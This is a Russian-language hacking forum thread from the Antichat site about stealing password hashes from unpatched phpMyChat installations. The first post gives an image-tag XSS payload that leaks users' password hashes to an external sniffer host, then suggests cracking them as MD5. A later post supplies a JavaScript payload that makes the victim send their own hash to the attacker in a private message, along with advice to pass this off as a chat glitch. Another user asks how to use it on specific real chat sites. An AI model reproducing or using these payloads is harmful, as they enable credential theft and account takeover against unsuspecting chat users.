ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Получаем пароли в phpMyChat
  #1  
Старый 12.06.2007, 02:46
Учаснег
Новичок
Регистрация: 25.05.2007
Сообщений: 2
Провел на форуме:
21058

Репутация: 1
По умолчанию Получаем пароли в phpMyChat

Работает во всех непропатченых чатах.
Много тут статей о том , как достать хеши пользователей...
Имхо.. , самый простой способ.
Все те же \x3c \x3e.
Создаем ссылку на а-чатовский сниффер,
\x3cimg src="http\x3a//old.antichat.ru/cgi-bin/s.jpg" name="imaga"\x3e
Кидаем ее в общак и бежим смотреть логи.
Там получается чтот вроде *
REFERER=http://-----PWD_Hash=2fdd85f2e81f897493942071267c94ad&First=1
То, что нам нужно , стоит после PWD_Hash=..... и до
&First=1.
Копиреум , и скармливаем проге MD5Inside.
Очень много вариантов , куда этот шеш можно деть-)
З.Ы. Ники на русском переводятся в цыферки и проценты , обратный ход можно получить с помощью яндеса, вставля их в запрос)

З.Ы.2 Первая статья. Сторого не судите.
 
Ответить с цитированием

  #2  
Старый 05.04.2008, 19:40
katala17
Новичок
Регистрация: 31.03.2008
Сообщений: 20
Провел на форуме:
58852

Репутация: 1
По умолчанию

непонял что куда копировать?
 
Ответить с цитированием

  #3  
Старый 05.04.2008, 20:36
katala17
Новичок
Регистрация: 31.03.2008
Сообщений: 20
Провел на форуме:
58852

Репутация: 1
По умолчанию

как это всё применить на http://citychat.spb.ru/ подскажите
 
Ответить с цитированием

  #4  
Старый 05.04.2008, 21:50
katala17
Новичок
Регистрация: 31.03.2008
Сообщений: 20
Провел на форуме:
58852

Репутация: 1
По умолчанию

ну или этот http://chat.xuk.ru/index.php
 
Ответить с цитированием

  #5  
Старый 28.04.2008, 22:49
TR0J@N
Участник форума
Регистрация: 30.03.2007
Сообщений: 131
Провел на форуме:
1449774

Репутация: 127
Отправить сообщение для TR0J@N с помощью ICQ
Post

А так непроще чтоб никуда небегать)

Код:
/TO ЖЕРТВА \x3cimg src=javascript:window.parent.window.input.document.MsgForm.M.value="/TO%20TROJAN%20"+window.parent.window.input.document.MsgForm.PWD_Hash.value;window.parent.window.input.document.MsgForm.submit() name="imaga"\x3e

Логично жертва логин кому отправляем, TROJAN наш логин)
Ну и в результате в приват к нам придёт хеш) (единсвенный минус енто жертва видит его, НО многие просто спрашивают "Что енто??" " ну и ответьте глюки чата, не просвещённый непоймёт что от него отправилось!)

Последний раз редактировалось TR0J@N; 29.04.2008 в 09:44..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Найденные пароли в этом разделе (md5) Thanat0z Расшифровка хешей 8 14.04.2007 23:50
Passcape Password Recovery Utilites ~!DoK_tOR!~ Soft - Windows 0 26.02.2007 20:49
Получаем пароли от почты mail.ru -FARAON2005RAMSES- E-Mail 31 14.10.2006 19:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ